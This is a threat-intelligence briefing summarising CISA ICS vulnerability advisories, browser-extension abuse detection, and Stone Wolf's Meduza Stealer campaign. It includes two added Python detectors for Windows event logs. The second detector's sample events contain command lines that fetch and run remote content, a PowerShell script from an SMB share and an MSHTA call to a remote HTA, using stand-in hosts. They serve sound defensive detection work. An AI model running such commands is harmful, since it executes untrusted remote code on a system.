CISA Warns of ICS Vulnerabilities, Browser Extension Exploits, and Stone Wolf's Meduza Stealer Attack - Intel Briefing September 8, 2024
Welcome to the Daily Threat Briefing for September 8, 2024. Today's briefing explores three stories: CISA releases an ICS advisory with four new vulnerabilities exploited in the wild, a TrustedSec report on browser-based attacks and defences, and reports on Meduza stealers in the latest campaigns targeting Russian organizations.
Executive Summary
1. CISA Releases New ICS Vulnerabilities
Actionable Takeaway: Organizations should prioritize patching and securing ICS systems, conducting thorough vulnerability assessments to safeguard critical infrastructures against potential exploitation.
2. Browser Extension Exploits on the Rise
Actionable Takeaway: Organizations must audit browser extensions, apply strict security policies, and leverage monitoring tools to identify potential misuse or installation of malicious extensions. Training end users to report system anomalies can help build a security culture and your human sensors.
3. Meduza Stealer Targets Russian Organizations
Actionable Takeaway: Implement proactive phishing awareness training and security measures to detect and prevent malware like Meduza Stealer. Monitoring underground forums for malware offerings can help organizations stay ahead of emerging threats.
CISA Releases Four Industrial Control Systems Advisories
On September 5, 2024, CISA released a technical report on multiple Industrial Control Systems (ICS) vulnerabilities. The report highlights critical weaknesses in Hughes Network Systems, Baxter, and Mitsubishi Electric products, underscoring the risks to critical infrastructure.
- Hughes Network Systems WL3000 Fusion Software: Vulnerabilities related to unencrypted credentials and lack of encryption for sensitive data. CVE-2024-39278: Insufficiently protected credentials, CVSS score 5.1. CVE-2024-42495: Missing encryption of sensitive data, CVSS score 7.1.
- Baxter Connex Health Portal: SQL Injection and improper access control vulnerabilities could lead to malicious code injection or unauthorized data access. CVE-2024-6795: SQL Injection, CVSS score 10.0. CVE-2024-6796: Improper access control, CVSS score 8.2.
- Mitsubishi Electric MELSEC iQ-R, Q, and L Series (Update E): A denial-of-service vulnerability affects Ethernet communication. CVE-2020-5652: Denial of service through uncontrolled resource consumption, CVSS score 7.5.
- Mitsubishi Electric MELSEC iQ-R, iQ-L Series, and MELIPC Series (Update E): Denial of service due to improper resource shutdown. CVE-2022-33324: Improper resource shutdown or release, CVSS score 7.5.
Insights and Analysis
The Baxter Connex Health Portal vulnerability, especially the SQL injection, stands out as an example of how poor input validation can expose critical systems to malicious actors.
- Human error and oversight in securing sensitive systems, such as improper input sanitization, often cause significant breaches.
- Secure coding practices, such as encrypted data storage and proper access control, remain essential for avoiding vulnerabilities like those seen in Hughes and Baxter systems.
- Denial-of-service vulnerabilities like those in Mitsubishi Electric systems highlight the importance of rigorous stress testing and patch management in critical environments.
- This highly technical report does not provide Indicators of Compromise (IoCs).
Browser Extension Exploits: Detection and Mitigation Strategies
On September 03, 2024, TrustedSec researchers released a technical report on browser extension exploitation and detection strategies. The report outlines practical steps to mitigate threats from malicious or abused browser extensions, providing useful insights for organizations focused on web-based threats.
- The report focuses on detecting browser extension misuse across major browsers, such as Chrome, Firefox, Edge, and Brave.
- Emphasizes the importance of enabling registry auditing, specifically monitoring Windows Event ID 4657 for detecting extension installations.
- The report demonstrates the use of Splunk queries to detect browser extension installations and modifications, with a practical example using the LastPass extension.
- Describes the significance of monitoring sensitive data extraction attempts using Event ID 4663 and process creation with Event ID 4688.
- References alternative detection methods developed by other researchers for expanding detection capabilities.
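The registry-auditing approach summarized above (Event ID 4657 writes under browser extension policy keys, with extension identifiers normalized across Chromium-based browsers and Firefox) as an added Python example; this is not code from the TrustedSec report. The watched key list, the ID formats and the sample events are assumptions constructed for the example.

```python
import re

# Watch-list of registry policy keys that force-install browser extensions.
# Assumed for this example; the report's own key list is not reproduced here.
WATCHED_KEYS = {
    r"\registry\machine\software\policies\google\chrome\extensioninstallforcelist": "chrome",
    r"\registry\machine\software\policies\microsoft\edge\extensioninstallforcelist": "edge",
    r"\registry\machine\software\policies\bravesoftware\brave\extensioninstallforcelist": "brave",
    r"\registry\machine\software\policies\mozilla\firefox\extensions\install": "firefox",
}
# Chromium-family IDs are 32 chars drawn from a-p; Firefox IDs are {GUID} or name@domain.
CHROMIUM_ID = re.compile(r"^[a-p]{32}$")
FIREFOX_ID = re.compile(r"^(\{[0-9a-f-]{36}\}|[^@\s/\\]+@[^@\s/\\]+)$", re.I)

def normalize_extension_id(browser, new_value):
    """Map a written registry value to a canonical (family, id) pair, or None."""
    if browser in ("chrome", "edge", "brave"):
        ext_id = new_value.split(";", 1)[0].strip().lower()   # "<id>;<update_url>"
        return ("chromium", ext_id) if CHROMIUM_ID.match(ext_id) else None
    if browser == "firefox":
        name = re.split(r"[\\/]", new_value.strip())[-1]        # URL or path to <id>.xpi
        ext_id = name[:-4] if name.lower().endswith(".xpi") else name
        return ("firefox", ext_id) if FIREFOX_ID.match(ext_id) else None
    return None

def detect_extension_installs(events):
    """Return an alert for every 4657 value write that lands under a watched key."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4657:
            continue
        key = ev.get("ObjectName", "").lower()
        browser = next((b for k, b in WATCHED_KEYS.items() if key.startswith(k)), None)
        if browser is None:
            continue
        alerts.append({"browser": browser, "user": ev.get("SubjectUserName"),
                       "process": ev.get("ProcessName"),
                       "extension": normalize_extension_id(browser, ev.get("NewValue", ""))})
    return alerts

# Constructed sample events (not real telemetry) using the field names of Event ID 4657.
SAMPLE_EVENTS = [
    {"EventID": 4657, "SubjectUserName": "alice", "ProcessName": r"C:\Windows\regedit.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist",
     "NewValue": "abcdefghijklmnopabcdefghijklmnop;https://clients2.google.com/service/update2/crx"},
    {"EventID": 4657, "SubjectUserName": "bob", "ProcessName": r"C:\Windows\System32\reg.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Policies\Mozilla\Firefox\Extensions\Install",
     "NewValue": r"\\fileserver\share\{12345678-1234-1234-1234-123456789abc}.xpi"},
    {"EventID": 4657, "SubjectUserName": "svc", "ProcessName": r"C:\Windows\System32\svchost.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "NewValue": r"C:\tools\up.exe"},
]
```

The third sample event is a non-browser registry write and is ignored, which is the noise a watch-list keyed on extension policy paths is meant to filter out before the alerts reach Splunk.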
Insights and Analysis
Browser extension abuse continues to be a serious cybersecurity risk due to the sheer number of extensions and the sensitive data stored within browsers.
- Human error, such as allowing unapproved browser extensions, can lead to major security gaps. Implementing strict access controls around extensions is a crucial defence.
- The difficulty of normalizing extension identifiers across different browsers underscores the need for security-conscious coding practices, especially for web applications that integrate with browsers.
- Splunk's tagging feature is a powerful tool for security teams, helping streamline detection and improve alerting.
- This report is technical and includes indicators of compromise (IoCs).
Stone Wolf Employs Meduza Stealer to Hack Russian Companies
On September 3, 2024, BI.ZONE released a technical report on a phishing campaign leveraging the Meduza Stealer malware to target Russian organizations. The attackers, identified as Stone Wolf, used phishing emails disguised as legitimate communication from industrial automation providers to distribute malicious payloads.
- The phishing emails contained an archive with a .p7s digital signature, a legitimate document as a decoy, and a malicious URL.
- The campaign utilized a PowerShell command to download and execute the Meduza Stealer payload from a remote SMB server.
- Meduza Stealer, available on underground forums, was used to steal credentials from browsers, password managers, and crypto-wallets.
- Key MITRE ATT&CK techniques observed include command and scripting interpreter (PowerShell) and system binary proxy execution (MSHTA).
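Detection logic for the two ATT&CK techniques named above, run over Event ID 4688 process-creation records, as an added Python example that is not part of the BI.ZONE report. The sub-technique IDs (T1059.001 PowerShell, T1218.005 Mshta) are standard ATT&CK identifiers; the field names follow Event ID 4688, and the sample events and the 203.0.113.10 host are constructed.

```python
import re

UNC_PATH = re.compile(r"\\\\[\w.-]+\\[^\s\"']+")     # \\host\share\... inside a command line
REMOTE_REF = re.compile(r"https?://|\\\\", re.I)      # URL or UNC reference

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify_process_event(ev):
    """Return ATT&CK-labelled findings for one 4688 event; empty list when nothing matches."""
    findings = []
    if ev.get("EventID") != 4688:
        return findings
    child = _basename(ev.get("NewProcessName", ""))
    parent = _basename(ev.get("ParentProcessName", ""))
    cmd = ev.get("CommandLine", "")
    # T1059.001: PowerShell pulling a script or binary from a remote SMB share
    if child in ("powershell.exe", "pwsh.exe") and UNC_PATH.search(cmd):
        findings.append("T1059.001: PowerShell invoked with a remote SMB path")
    # T1218.005: mshta.exe used as a proxy to run remote content
    if child == "mshta.exe" and REMOTE_REF.search(cmd):
        findings.append("T1218.005: mshta.exe launched with remote content")
    # T1218.005 (chained): mshta.exe handing off to a script interpreter
    if parent == "mshta.exe" and child in ("powershell.exe", "pwsh.exe", "cmd.exe"):
        findings.append("T1218.005: mshta.exe spawning a script interpreter")
    return findings

def scan_process_events(events):
    """Return (event_index, findings) for each event that produced at least one finding."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify_process_event(ev))]

# Constructed sample events (not real telemetry) in the field layout of Event ID 4688.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\mshta.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://updates.example.test/readme.hta"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -NoProfile -File \\203.0.113.10\share\update.ps1"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]
```

Command-line logging must be enabled for 4688 (the CommandLine field is empty by default), otherwise only the parent/child check fires.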
Insights and Analysis
Using legitimate brands in phishing campaigns emphasizes the role of human trust in cybersecurity breaches.
- Employees need continuous training to recognize phishing techniques, as attackers often use trusted brands to manipulate victims.
- Secure code practices are essential in preventing the misuse of system binaries like MSHTA, which was exploited in this attack.
- Monitoring underground forums for malware-as-a-service offerings, like Meduza Stealer, can help organizations avoid new threats.
- This report is technical and includes indicators of compromise (IoCs).
Purpose and Disclaimer
Welcome to Daily Threat Insights and Analysis, where I present three key stories that captured my attention as a threat intelligence professional. Please note that these reports are not affiliated with any organization, and my insights should be considered opinions or a starting point for navigating the vast sea of public reporting. Before taking action, conduct a thorough impact analysis specific to your business needs. Follow me for more content and stay ahead in the ever-evolving world of threat intelligence.